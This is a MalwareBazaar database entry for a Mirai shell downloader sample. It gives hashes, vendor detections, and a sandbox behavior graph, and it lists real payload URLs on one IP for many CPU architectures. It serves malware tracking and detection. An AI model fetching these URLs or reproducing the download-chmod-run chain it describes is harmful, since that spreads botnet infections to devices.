MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 5


Intelligence 5 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566
SHA3-384 hash: e90fbc6bd45f2a3aaa2b6c153ac1fbbe5474b636ee32413f17e322bd46b6e335f5e1e829c3ebf270ca04ccd4cce2abae
SHA1 hash: 3b3e9e80818e12efc1f7663ae0b9fb0429310bf9
MD5 hash: 0c4fa7684c36b13ccf49a87c8ca58d33
humanhash: bacon-sixteen-mockingbird-five
File name:w.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:957 bytes
First seen:2025-11-28 20:12:17 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 24:85x7cb+c6NIpHcCKlQckBlcrELgcq5ckQcS6acgKcQlcXR:8r7cb+cBHcCUQc6lcrigcgckQcSlcgK6
TLSH T1D21194DE02A1B23146ACDD4C3429C418A64486C266AB1E4C9C8C44F6ADD4B1BF916F8A
Magika txt
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://176.65.132.156/bins/parmbd8ccc0b43135c2a27009eff3c6021a76f035eaa78a21adf36fbc4703a9798f0 Miraimirai opendir
http://176.65.132.156/bins/parm5c235716871260e982f4c1cd422644ae1dc3c3339c6021a60d31757987e18bc84 Miraimirai opendir
http://176.65.132.156/bins/parm6bca096353181b61d7a8f360e5128661e102128870a3c8da4228a2d917333396d Miraimirai opendir
http://176.65.132.156/bins/parm73fc6fa5f93e1fa38af21c1005c1f082b738c879c293a27fe79944fbd156438cc Miraimirai opendir
http://176.65.132.156/bins/psh4f40265e26ef64933ff5826b3ba49c5b73f58dd4a100268f8ba88081cd14bdb75 Miraimirai opendir
http://176.65.132.156/bins/parcn/an/aelf ua-wget
http://176.65.132.156/bins/pmipsb4ed8126ad1c0844485ad4dc05046d4befa6a9c9e57dae386c03add105883496 Miraimirai opendir
http://176.65.132.156/bins/pmpsl9e1380153a681f7bcd2e8ed4d41f726ac8511ac37fb5f8f3cd510b81d0ae2957 Miraimirai opendir
http://176.65.132.156/bins/pppc8df9768079b1437a33e2007fa29d5602885ba8b655e0bf1a1f04ab0122d1e09d Miraimirai opendir
http://176.65.132.156/bins/px864792959c77de8cf52953ccccdd80c1a53e54ce7009ede67e613a98989ea4045b Miraimirai opendir
http://176.65.132.156/bins/pspc4739baeaabcb76449c853ed0bbdea48f26f143f4238c83ea818e01327fe5b460 Miraimirai opendir

Intelligence

File Origin
# of uploads :
1
# of downloads :
28
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Linux.Downloader-32.UNOFFICIAL
Create hunting rule

Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
busybox mirai
Link:
https://www.filescan.io/uploads/692a026d06363f28214fc2a8/reports/1a281566-f59f-4604-87fe-8ea20526e377/overview
Verdict:
Unknown
File Type:
text
Link:
https://opentip.kaspersky.com/b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/a5d1861b-3519-4e0c-9c82-4a36cb7ab8f0
Behavior Graph:
Download SVG
%3 guuid=a79d94cd-2600-0000-7783-1db70f040000 pid=1039 /usr/bin/sudo guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042 /tmp/sample.bin guuid=a79d94cd-2600-0000-7783-1db70f040000 pid=1039->guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042 execve guuid=cfbb05d0-2600-0000-7783-1db714040000 pid=1044 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=cfbb05d0-2600-0000-7783-1db714040000 pid=1044 execve guuid=79a01ed3-2600-0000-7783-1db719040000 pid=1049 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=79a01ed3-2600-0000-7783-1db719040000 pid=1049 execve guuid=c4857bd3-2600-0000-7783-1db71a040000 pid=1050 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=c4857bd3-2600-0000-7783-1db71a040000 pid=1050 clone guuid=f4072ad4-2600-0000-7783-1db71e040000 pid=1054 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=f4072ad4-2600-0000-7783-1db71e040000 pid=1054 execve guuid=e050eed6-2600-0000-7783-1db725040000 pid=1061 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=e050eed6-2600-0000-7783-1db725040000 pid=1061 execve guuid=5ee24ad7-2600-0000-7783-1db727040000 pid=1063 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=5ee24ad7-2600-0000-7783-1db727040000 pid=1063 clone guuid=147f52d8-2600-0000-7783-1db72a040000 pid=1066 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=147f52d8-2600-0000-7783-1db72a040000 pid=1066 execve guuid=20533edb-2600-0000-7783-1db733040000 pid=1075 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=20533edb-2600-0000-7783-1db733040000 pid=1075 execve guuid=d31d7edb-2600-0000-7783-1db734040000 pid=1076 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=d31d7edb-2600-0000-7783-1db734040000 pid=1076 clone guuid=3b8045dc-2600-0000-7783-1db736040000 pid=1078 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=3b8045dc-2600-0000-7783-1db736040000 pid=1078 execve guuid=62b3d0df-2600-0000-7783-1db740040000 pid=1088 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=62b3d0df-2600-0000-7783-1db740040000 pid=1088 execve guuid=366a27e0-2600-0000-7783-1db741040000 pid=1089 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=366a27e0-2600-0000-7783-1db741040000 pid=1089 clone guuid=f4fdb9e0-2600-0000-7783-1db745040000 pid=1093 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=f4fdb9e0-2600-0000-7783-1db745040000 pid=1093 execve guuid=236875e4-2600-0000-7783-1db74d040000 pid=1101 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=236875e4-2600-0000-7783-1db74d040000 pid=1101 execve guuid=cd1dbde4-2600-0000-7783-1db74f040000 pid=1103 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=cd1dbde4-2600-0000-7783-1db74f040000 pid=1103 clone guuid=2ab3c7e4-2600-0000-7783-1db750040000 pid=1104 /usr/bin/busybox net send-data guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=2ab3c7e4-2600-0000-7783-1db750040000 pid=1104 execve guuid=9dfc61e7-2600-0000-7783-1db759040000 pid=1113 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=9dfc61e7-2600-0000-7783-1db759040000 pid=1113 execve guuid=3140a0e7-2600-0000-7783-1db75b040000 pid=1115 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=3140a0e7-2600-0000-7783-1db75b040000 pid=1115 clone guuid=b2a6aae7-2600-0000-7783-1db75c040000 pid=1116 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=b2a6aae7-2600-0000-7783-1db75c040000 pid=1116 execve guuid=01e585ea-2600-0000-7783-1db765040000 pid=1125 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=01e585ea-2600-0000-7783-1db765040000 pid=1125 execve guuid=169cceea-2600-0000-7783-1db767040000 pid=1127 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=169cceea-2600-0000-7783-1db767040000 pid=1127 clone guuid=d21fa2eb-2600-0000-7783-1db76b040000 pid=1131 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=d21fa2eb-2600-0000-7783-1db76b040000 pid=1131 execve guuid=b5817eee-2600-0000-7783-1db775040000 pid=1141 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=b5817eee-2600-0000-7783-1db775040000 pid=1141 execve guuid=d854bdee-2600-0000-7783-1db777040000 pid=1143 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=d854bdee-2600-0000-7783-1db777040000 pid=1143 clone guuid=dd8e3aef-2600-0000-7783-1db77b040000 pid=1147 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=dd8e3aef-2600-0000-7783-1db77b040000 pid=1147 execve guuid=692e27f2-2600-0000-7783-1db782040000 pid=1154 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=692e27f2-2600-0000-7783-1db782040000 pid=1154 execve guuid=e1d762f2-2600-0000-7783-1db784040000 pid=1156 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=e1d762f2-2600-0000-7783-1db784040000 pid=1156 clone guuid=651caff3-2600-0000-7783-1db788040000 pid=1160 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=651caff3-2600-0000-7783-1db788040000 pid=1160 execve guuid=ebd59ff6-2600-0000-7783-1db790040000 pid=1168 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=ebd59ff6-2600-0000-7783-1db790040000 pid=1168 execve guuid=c73311f7-2600-0000-7783-1db792040000 pid=1170 /home/sandbox/px86 delete-file net guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=c73311f7-2600-0000-7783-1db792040000 pid=1170 execve guuid=55287ff7-2600-0000-7783-1db795040000 pid=1173 /usr/bin/busybox net send-data guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=55287ff7-2600-0000-7783-1db795040000 pid=1173 execve guuid=3d6791f9-2600-0000-7783-1db799040000 pid=1177 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=3d6791f9-2600-0000-7783-1db799040000 pid=1177 execve guuid=e0cd13fa-2600-0000-7783-1db79b040000 pid=1179 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=e0cd13fa-2600-0000-7783-1db79b040000 pid=1179 clone guuid=673421fb-2600-0000-7783-1db7a0040000 pid=1184 /usr/bin/busybox net send-data write-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=673421fb-2600-0000-7783-1db7a0040000 pid=1184 execve guuid=bcffb1ff-2600-0000-7783-1db7a9040000 pid=1193 /usr/bin/chmod guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=bcffb1ff-2600-0000-7783-1db7a9040000 pid=1193 execve guuid=f97fe9ff-2600-0000-7783-1db7ab040000 pid=1195 /usr/bin/dash guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=f97fe9ff-2600-0000-7783-1db7ab040000 pid=1195 clone guuid=9c6fb500-2700-0000-7783-1db7b0040000 pid=1200 /usr/bin/rm delete-file guuid=dbbba9cf-2600-0000-7783-1db712040000 pid=1042->guuid=9c6fb500-2700-0000-7783-1db7b0040000 pid=1200 execve 9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 176.65.132.156:80 guuid=cfbb05d0-2600-0000-7783-1db714040000 pid=1044->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 86B guuid=f4072ad4-2600-0000-7783-1db71e040000 pid=1054->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 87B guuid=147f52d8-2600-0000-7783-1db72a040000 pid=1066->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 87B guuid=3b8045dc-2600-0000-7783-1db736040000 pid=1078->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 87B guuid=f4fdb9e0-2600-0000-7783-1db745040000 pid=1093->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 86B guuid=2ab3c7e4-2600-0000-7783-1db750040000 pid=1104->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 86B guuid=b2a6aae7-2600-0000-7783-1db75c040000 pid=1116->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 87B guuid=d21fa2eb-2600-0000-7783-1db76b040000 pid=1131->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 87B guuid=dd8e3aef-2600-0000-7783-1db77b040000 pid=1147->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 86B guuid=651caff3-2600-0000-7783-1db788040000 pid=1160->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 86B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=c73311f7-2600-0000-7783-1db792040000 pid=1170->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=8f3977f7-2600-0000-7783-1db794040000 pid=1172 /home/sandbox/px86 net send-data zombie guuid=c73311f7-2600-0000-7783-1db792040000 pid=1170->guuid=8f3977f7-2600-0000-7783-1db794040000 pid=1172 clone guuid=8f3977f7-2600-0000-7783-1db794040000 pid=1172->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con f51bd2c4-5d38-5f2a-bfc5-4b537f013af1 176.65.132.156:18129 guuid=8f3977f7-2600-0000-7783-1db794040000 pid=1172->f51bd2c4-5d38-5f2a-bfc5-4b537f013af1 send: 15B guuid=5f7883f7-2600-0000-7783-1db796040000 pid=1174 /home/sandbox/px86 guuid=8f3977f7-2600-0000-7783-1db794040000 pid=1172->guuid=5f7883f7-2600-0000-7783-1db796040000 pid=1174 clone guuid=10b086f7-2600-0000-7783-1db797040000 pid=1175 /home/sandbox/px86 guuid=8f3977f7-2600-0000-7783-1db794040000 pid=1172->guuid=10b086f7-2600-0000-7783-1db797040000 pid=1175 clone guuid=55287ff7-2600-0000-7783-1db795040000 pid=1173->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 86B guuid=673421fb-2600-0000-7783-1db7a0040000 pid=1184->9654c859-3dd1-5bbf-94a6-2b0e7540dcb0 send: 86B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566/
Threat name:
Script-Shell.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-11-28 20:13:26 UTC
File Type:
Text (Shell)
AV detection:
11 of 24 (45.83%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=wsvscgov2jngvsc43qi6srcmohercumhgkg2zdmb4asfdnofivta._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251128-yzj3sahr6w/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566

(this sample)

Mirai

elf 5e26a14c3ae57e70937134c1b7209bae94486de00ac81b25656a53b8ccec5be8

Mirai

elf bd8ccc0b43135c2a27009eff3c6021a76f035eaa78a21adf36fbc4703a9798f0

  
URLhaus
https://urlhaus.abuse.ch/url/3719157/
  
Delivery method
Distributed via web download
  
Dropping
MD5 5679eda84a53da2ee8568830cbc298b8
  
Dropping
SHA256 bd8ccc0b43135c2a27009eff3c6021a76f035eaa78a21adf36fbc4703a9798f0

Comments